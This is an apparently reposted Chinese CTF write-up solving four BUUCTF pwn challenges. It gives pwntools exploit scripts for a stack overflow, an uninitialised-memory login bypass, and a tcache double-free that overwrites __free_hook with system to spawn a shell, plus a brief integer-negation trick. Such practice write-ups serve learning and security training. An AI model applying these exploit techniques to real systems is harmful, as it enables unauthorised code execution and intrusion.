PWN-PRACTICE-BUUCTF-26
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-26
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
PWN-PRACTICE-BUUCTF-26
- 護(hù)網(wǎng)杯_2018_gettingstart
- wustctf2020_number_game
- picoctf_2018_are you root
- ciscn_2019_en_3
護(hù)網(wǎng)杯_2018_gettingstart
read到buf的時(shí)候有溢出,覆寫v5為0x7FFFFFFFFFFFFFFF,v6為0x3FB999999999999A
from pwn import * io=remote("node4.buuoj.cn",29057) io.recvuntil("But Whether it starts depends on you.\n") v5=0x7FFFFFFFFFFFFFFF v6=0x3FB999999999999A payload=p64(0)*3+p64(v5)+p64(v6) io.send(payload) io.sendline("cat flag") io.interactive()wustctf2020_number_game
neg對(duì)操作數(shù)執(zhí)行求補(bǔ)運(yùn)算:用零減去操作數(shù),然后結(jié)果返回操作數(shù)
求補(bǔ)運(yùn)算也可以表達(dá)成:將操作數(shù)按位取反后加1
0x80000000按位取反后加1,仍然是0x80000000,發(fā)送-2147483648即可
picoctf_2018_are you root
未初始化驗(yàn)證漏洞,參考:PicoCTF_2018_are_you_root(未初始化驗(yàn)證漏洞)
# -*- coding:utf-8 -*- from pwn import * #io = process('./PicoCTF_2018_are_you_root') io = remote('node4.buuoj.cn',26285)def login(name):io.sendlineafter('>','login ' + name)def reset():io.sendlineafter('>','reset')def getFlag():io.sendlineafter('>','get-flag')login('a'*0x8 + p64(0x5)) reset() login('P1umH0') getFlag()io.interactive()ciscn_2019_en_3
puts泄露libc,uaf + double free,參考:ciscn_2019_en_3 tcache
# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./ciscn_2019_en_3") io=remote("node4.buuoj.cn",29625) elf=ELF("./ciscn_2019_en_3") libc=ELF("./libc-2.27-18-x64.so")io.sendlineafter("What's your name?\n","P1umH0") io.sendlineafter("Please input your ID.\n","a"*8) setbuffer_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-231 libc_base=setbuffer_addr-libc.sym["setbuffer"] free_hook=libc_base+libc.sym["__free_hook"] system=libc_base+libc.sym["system"]def add(size,content):io.sendlineafter("Input your choice:","1")io.sendlineafter("Please input the size of story: \n",str(size))io.sendlineafter("please inpute the story: \n",content) def edit():io.sendlineafter("Input your choice:","2") def show():io.sendlineafter("Input your choice:","3") def free(index):io.sendlineafter("Input your choice:","4")io.sendlineafter("Please input the index:\n",str(index)) def exit():io.sendlineafter("Input your choice:","5")#gdb.attach(io) #pause()add(0x20,"aaaa")#0 add(0x20,"/bin/sh\x00")#1#pause()free(0) free(0)#pause()add(0x20,p64(free_hook))#pause()add(0x20,"bbbb")#pause()add(0x20,p64(system))#pause()free(1)io.interactive()總結(jié)
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-26的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 招行现金分期影响提额吗 招行现金分期提额
- 下一篇: 买十万有2万利息的国债来了,今年仅剩最后